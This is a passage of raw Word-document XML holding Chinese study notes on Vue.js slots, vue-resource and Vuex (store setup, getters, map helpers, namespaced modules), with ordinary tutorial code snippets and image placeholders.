        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- npm i vue-resource --save</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·官方已不再维护，了解即可，一般用axios</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="4500245"/>
            <wp:effectExtent l="0" t="0" r="635" b="10795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5091430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1397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·其他的用法和axios一样</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>slot 插槽</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>让父组件可以向子组件指定位置插入html结构，也是一种组件间通信的方式，适用于父组件 ===&gt; 子组件</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·分类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 默认插槽、具名插槽、作用域插槽</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·使用方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 默认插槽</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 父组件中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html结构1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ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 子组件中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ind w:firstLine="420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ind w:firstLine="420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&lt;!-- 定义插槽 --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="228" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420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插槽默认内容...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ind w:firstLine="420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ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 具名插槽</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 父组件中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"center"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html结构1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footer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html结构2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ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 子组件中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&lt;!-- 定义插槽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"center"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插槽默认内容...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插槽默认内容...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ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 作用域插槽</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 理解：数据在组件的自身，但根据数据生成的结构需要组件的使用者来决定。（games数据在Category组件中，但使用数据所遍历出来的结构由App组件决定）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 具体编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--- 父组件中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"scopeData"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生成的是ul列表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slot-scope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"scopeData"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生成的是h4标题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ind w:left="840" w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--- 子组件中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'Category'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'title'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//数据在子组件自身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'红色警戒'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'穿越火线'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'劲舞团'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'超级玛丽'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·效果一（不使用插槽）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3759835" cy="1761490"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
            <wp:docPr id="9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21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效果二（默认插槽）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3839210" cy="1923415"/>
            <wp:effectExtent l="0" t="0" r="1270" b="12065"/>
            <wp:docPr id="9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2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"美食"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"https://s3.ax1x.com/2021/01/16/srJlq0.jpg"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"游戏"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"电影"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controls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"http://clips.vorwaerts-gmbh.de/big_buck_bunny.mp4"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'./components/Category'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'火锅'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'烧烤'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'小龙虾'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'牛排'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'红色警戒'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'穿越火线'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'劲舞团'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'超级玛丽'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films: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'《教父》'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'《拆弹专家》'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'《你好，李焕英》'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'《尚硅谷》'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flex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空白分布到元素两侧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justify-content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space-around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·Category.vue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"category"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}}分类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定义一个插槽（挖个坑，等着组件的使用者进行填充）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我是一些默认值，当使用者没有传递具体结构时，我会出现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'Category'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'title'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/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>效果三（具名插槽）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3913505" cy="1926590"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8890"/>
            <wp:docPr id="9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333500" cy="1264920"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="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"美食"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slot绑定插槽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"center"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"https://s3.ax1x.com/2021/01/16/srJlq0.jpg"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更多美食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"游戏"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"center"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单机游戏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网络游戏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"电影"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"center"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controls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src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"http://clips.vorwaerts-gmbh.de/big_buck_bunny.mp4"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v-slot:footer只能使用在template标签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v-slot:footer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经典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热门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"http://www.atguigu.com"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推荐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欢迎前来观影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'./components/Category'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'火锅'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'烧烤'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'小龙虾'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'牛排'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'红色警戒'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'穿越火线'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'劲舞团'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'超级玛丽'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films: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'《教父》'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'《拆弹专家》'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'《你好，李焕英》'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'《尚硅谷》'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.foot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flex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justify-content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space-around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·Category.vue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"category"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}}分类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定义一个插槽（挖个坑，等着组件的使用者进行填充）,并命名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"center"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我是一些默认值，当使用者没有传递具体结构时，我会出现1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"footer"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我是一些默认值，当使用者没有传递具体结构时，我会出现2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'Category'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'title'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·效果四（作用域插槽）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4062730" cy="1886585"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
            <wp:docPr id="10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24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356" cy="188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</w:pP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333500" cy="1264920"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0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"container"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"游戏"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必须使用template标签接收数据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"atguigu"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atguigu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"游戏"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{games}使用解构赋值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"{games}"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"color:red"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"游戏"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slot-scope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"{games}"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index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'./components/Category'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.container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.foot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display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flex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justify-content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space-around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h4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rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Category.vue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"category"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}}分类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:games="games"将games传给使用该插槽的结构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msg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"hello"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我是默认的一些内容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slot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'Category'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props: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'title'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games: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'红色警戒'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'穿越火线'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'劲舞团'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'超级玛丽'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scoped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.category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skyblue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height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300px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text-align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center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background-color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orange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video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img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width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100%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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pP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Vuex简介</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·在Vue中实现集中式状态（数据）管理的一个Vue插件，对vue应用中多个组件的共享状态进行集中式的管理（读/写），也是一种组件间通信的方式，且适用于任意组件间通信</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·多个组件需要共享数据时使用</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">·Github 地址: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/vuejs/vuex" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/vuejs/vuex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p/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87" name="图片 87" descr="bf135378065d824c52a49dfac4b7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bf135378065d824c52a49dfac4b777c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59070" cy="3286760"/>
            <wp:effectExtent l="0" t="0" r="13970" b="5080"/>
            <wp:docPr id="88" name="图片 88" descr="6165a031f9e6650def2e85297037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6165a031f9e6650def2e852970375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求和案例纯vue版</w:t>
      </w:r>
    </w:p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508760" cy="1051560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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'./components/Count'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t>vuex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="4135755"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="82" name="图片 82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vuex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27955" cy="3443605"/>
            <wp:effectExtent l="0" t="0" r="14605" b="635"/>
            <wp:docPr id="89" name="图片 89" descr="e433facd70d7b7b72b9c04c1836b8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e433facd70d7b7b72b9c04c1836b83a"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:srcRect l="12111" t="13427" r="15733" b="10529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044440" cy="3959225"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="90" name="图片 90" descr="fc21e66d9f160ea6b25c3f681f19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fc21e66d9f160ea6b25c3f681f19942"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:srcRect l="18341" t="11283" r="18341" b="919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5052695" cy="3093720"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="91" name="图片 91" descr="fe5f50b688eb192a23614cf78d938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fe5f50b688eb192a23614cf78d9387e"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:srcRect l="12764" t="10192" r="8155" b="11594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搭建</w:t>
      </w:r>
      <w:r>
        <w:t>vuex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·安装vuex模块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- npm i vuex --save</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·创建文件：src/store/index.js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//引入Vue核心库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//准备actions对象——响应组件中用户的动作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//准备mutations对象——修改state中的数据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//准备state对象——保存具体的数据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·在main.js中创建vm时传入store配置项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'./store'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·组件中读取vuex中的数据：$store.state.sum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·组件中修改vuex中的数据：$store.dispatch('action中的方法名',数据) 或 $store.commit('mutations中的方法名',数据)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·备注：若没有网络请求或其他业务逻辑，组件中也可以越过actions，即不写dispatch，直接编写commit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·为什么context上下文对象还有dispatch方法？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 当action方法中的逻辑非常复杂时，可使用dispatch调用action中的其它方法，也可以提高代码复用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·为什么不在action中直接操作数据？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 这样虽然能实现功能，但是开发者工具检测不到state中数据的改变，不便于开发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·为什么不再组件中直接操作数据？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 当逻辑非常复杂时，代码复用率低，并且不好维护</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 开发者工具检测不到state中数据的改变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>求和案例vuex版</w:t>
      </w:r>
    </w:p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440180" cy="1691640"/>
            <wp:effectExtent l="0" t="0" r="762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获取store中的数据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使用commit方法将方法名和数据传给mutations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//使用dispatch将方法名和数据提交给actions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//该文件用于创建Vuex中最为核心的store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//准备actions——用于响应组件中的动作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//actions中的方法名用小写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jia(context,value){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jian(context,value){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console.log('actions中的jian被调用了')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context.commit('JIAN',value)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//第一个参数是上下文,第二个参数是传过来的数据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'actions中的jiaOdd被调用了'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使用commit方法将方法名和数据传给mutations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'actions中的jiaWait被调用了'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//准备mutations——用于操作数据（state）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//mutations中的方法名用大写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//第一个参数是state对象,第二个参数是传过来的数据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//将sum的值加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//准备state——用于存储数据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'./components/Count'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console.log('App',this)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'./store'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pacing w:after="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vuex开发者工具的使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·查看组件及组件中的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4343400" cy="2407920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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·查看自定义事件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4351020" cy="1973580"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="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·查看vuex的函数调用情况及数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4366260" cy="5798820"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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getters配置项</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·当state中的数据需要经过加工后再使用时，可以使用getters加工</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·在store.js中追加getters配置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*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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体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......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·组件中读取数据：$store.getters.bigSum</w:t>
      </w:r>
    </w:p>
    <w:p/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478280" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="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//该文件用于创建Vuex中最为核心的store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//准备actions——用于响应组件中的动作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jia(context,value){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jian(context,value){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console.log('actions中的jian被调用了')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context.commit('JIAN',value)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'actions中的jiaOdd被调用了'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'actions中的jiaWait被调用了'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//准备mutations——用于操作数据（state）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//准备state——用于存储数据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//准备getters——用于将state中的数据进行加工，使用方法类似于计算属性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*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//配置getters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pacing w:after="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p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使用getters的值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当前求和放大10倍为：{{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pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>四个map方法的使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mapState方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·用于帮助我们映射state中的数据为计算属性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computed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//借助mapState生成计算属性：sum、school、subject（对象写法）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//借助mapState生成计算属性：sum、school、subject（数组写法）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/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>mapGetters方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·用于帮助我们映射getters中的数据为计算属性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computed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//借助mapGetters生成计算属性：bigSum（对象写法）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bigSum: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//借助mapGetters生成计算属性：bigSum（数组写法）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/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·要改变的文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1516380" cy="1584960"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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当前求和放大10倍为：{{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我在{{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}}，学习{{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引入maoState和mapGetters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//靠程序员自己亲自去写计算属性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sum(){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return this.$store.state.sum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school(){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return this.$store.state.school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subject(){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return this.$store.state.subject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//借助mapState生成计算属性，从state中读取数据。（对象写法）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...mapState({he:'sum',xuexiao:'school',xueke:'subject'}),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//借助mapState生成计算属性，从state中读取数据。（数组写法）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********************************************************************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bigSum(){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return this.$store.getters.bigSum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//借助mapGetters生成计算属性，从getters中读取数据。（对象写法）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...mapGetters({bigSum:'bigSum'})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//借助mapGetters生成计算属性，从getters中读取数据。（数组写法）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xuexiao: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xueke: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//该文件用于创建Vuex中最为核心的store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//准备actions——用于响应组件中的动作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jia(context,value){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jian(context,value){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console.log('actions中的jian被调用了')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context.commit('JIAN',value)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'actions中的jiaOdd被调用了'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'actions中的jiaWait被调用了'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//准备mutations——用于操作数据（state）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//准备state——用于存储数据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'前端'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//准备getters——用于将state中的数据进行加工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*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pacing w:after="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>mapActions方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·用于帮助我们生成与actions对话的方法，即：包含$store.dispatch(xxx)的函数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methods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//靠mapActions生成：incrementOdd、incrementWait（对象形式）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//靠mapActions生成：incrementOdd、incrementWait（数组形式）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pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>mapMutations方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·用于帮助我们生成与mutations对话的方法，即：包含$store.commit(xxx)的函数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methods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//靠mapActions生成：increment、decrement（对象形式）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//靠mapMutations生成：JIA、JIAN（对象形式）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·备注：mapActions与mapMutations使用时，若需要传递参数需要：在模板中绑定事件时传递好参数，否则参数是事件对象。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·要改变的文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1516380" cy="1584960"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="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当前求和放大10倍为：{{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我在{{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}}，学习{{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需要将参数n传入，不然无法传递值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//引入mapState、mapGetters、mapMutations、mapActions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//借助mapState生成计算属性，从state中读取数据。（对象写法）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...mapState({he:'sum',xuexiao:'school',xueke:'subject'}),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//借助mapState生成计算属性，从state中读取数据。（数组写法）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********************************************************************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//借助mapGetters生成计算属性，从getters中读取数据。（对象写法）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...mapGetters({bigSum:'bigSum'})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//借助mapGetters生成计算属性，从getters中读取数据。（数组写法）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//程序员亲自写方法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increment(){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this.$store.commit('JIA',this.n)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decrement(){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this.$store.commit('JIAN',this.n)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//借助mapMutations生成对应的方法，方法中会调用commit去联系mutations(对象写法)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//借助mapMutations生成对应的方法，方法中会调用commit去联系mutations(数组写法)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...mapMutations(['JIA','JIAN']),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*************************************************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//程序员亲自写方法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incrementOdd(){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this.$store.dispatch('jiaOdd',this.n)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incrementWait(){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this.$store.dispatch('jiaWait',this.n)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//借助mapActions生成对应的方法，方法中会调用dispatch去联系actions(对象写法)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//借助mapActions生成对应的方法，方法中会调用dispatch去联系actions(数组写法)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...mapActions(['jiaOdd','jiaWait'])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xuexiao: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xueke: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//该文件用于创建Vuex中最为核心的store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//准备actions——用于响应组件中的动作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jia(context,value){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jian(context,value){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console.log('actions中的jian被调用了')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context.commit('JIAN',value)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'actions中的jiaOdd被调用了'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'actions中的jiaWait被调用了'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//准备mutations——用于操作数据（state）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//准备state——用于存储数据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'前端'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//准备getters——用于将state中的数据进行加工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*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pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多组件共享数据</w:t>
      </w:r>
    </w:p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432560" cy="169926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当前求和放大10倍为：{{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我在{{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}}，学习{{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"color:red"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Person组件的总人数是：{{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length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//借助mapState生成计算属性，从state中读取数据。（数组写法）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'personList'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//借助mapGetters生成计算属性，从getters中读取数据。（数组写法）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//借助mapMutations生成对应的方法，方法中会调用commit去联系mutations(对象写法)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//借助mapActions生成对应的方法，方法中会调用dispatch去联系actions(对象写法)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const x = mapState({he:'sum',xuexiao:'school',xueke:'subject'})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console.log(x)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·Person.vue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"color:red"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Count组件求和为：{{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"请输入名字"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'nanoid'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'ADD_PERSON'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//该文件用于创建Vuex中最为核心的store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//准备actions——用于响应组件中的动作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jia(context,value){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jian(context,value){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console.log('actions中的jian被调用了')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context.commit('JIAN',value)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'actions中的jiaOdd被调用了'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'actions中的jiaWait被调用了'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//准备mutations——用于操作数据（state）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ADD_PERSON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'mutations中的ADD_PERSON被调用了'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//准备state——用于存储数据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'前端'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//准备getters——用于将state中的数据进行加工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*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'./components/Count'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'./components/Person'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console.log('App',this)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·main.js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vueResource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'vue-resource'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'./store'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vueResource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jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>模块化+命名空间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·让代码更好维护，让多种数据分类更加明确</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·修改store.js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countAbout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namespaced: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//开启命名空间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x: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 ...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 ...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*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namespaced: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//开启命名空间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 ...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 ...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 ...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modules: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})</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·开启命名空间后，组件中读取state数据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//方式一：自己直接读取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list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//方式二：借助mapState读取：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/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·开启命名空间后，组件中读取getters数据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//方式一：自己直接读取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'personAbout/firstPersonName'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//方式二：借助mapGetters读取：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/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·开启命名空间后，组件中调用dispatch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//方式一：自己直接dispatch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'personAbout/addPersonWang'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//方式二：借助mapActions：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·开启命名空间后，组件中调用commit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//方式一：自己直接commit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'personAbout/ADD_PERSON'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//方式二：借助mapMutations：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722120" cy="2148840"/>
            <wp:effectExtent l="0" t="0" r="0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·Count.vue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当前求和放大10倍为：{{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我在{{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}}，学习{{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"color:red"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Person组件的总人数是：{{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length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number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option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select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+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decrement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-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当前求和为奇数再加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incrementWait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等一等再加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//用户选择的数字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...mapState(['countAbout','personAbout']),//可以这么用，但是麻烦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//借助mapState生成计算属性，从state中读取数据。（数组写法）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//从countAbout中找，需要设置命名空间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'subject'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//从personAbout中找，需要设置命名空间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'personList'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//借助mapGetters生成计算属性，从getters中读取数据。（数组写法）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'bigSum'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//借助mapMutations生成对应的方法，方法中会调用commit去联系mutations(对象写法)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mapMutations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decrement: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//借助mapActions生成对应的方法，方法中会调用dispatch去联系actions(对象写法)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...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mapActions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'countAbout'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incrementOdd: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'jiaOdd'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incrementWait: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'jiaWait'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"css"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7BA7D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margin-left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5px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>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
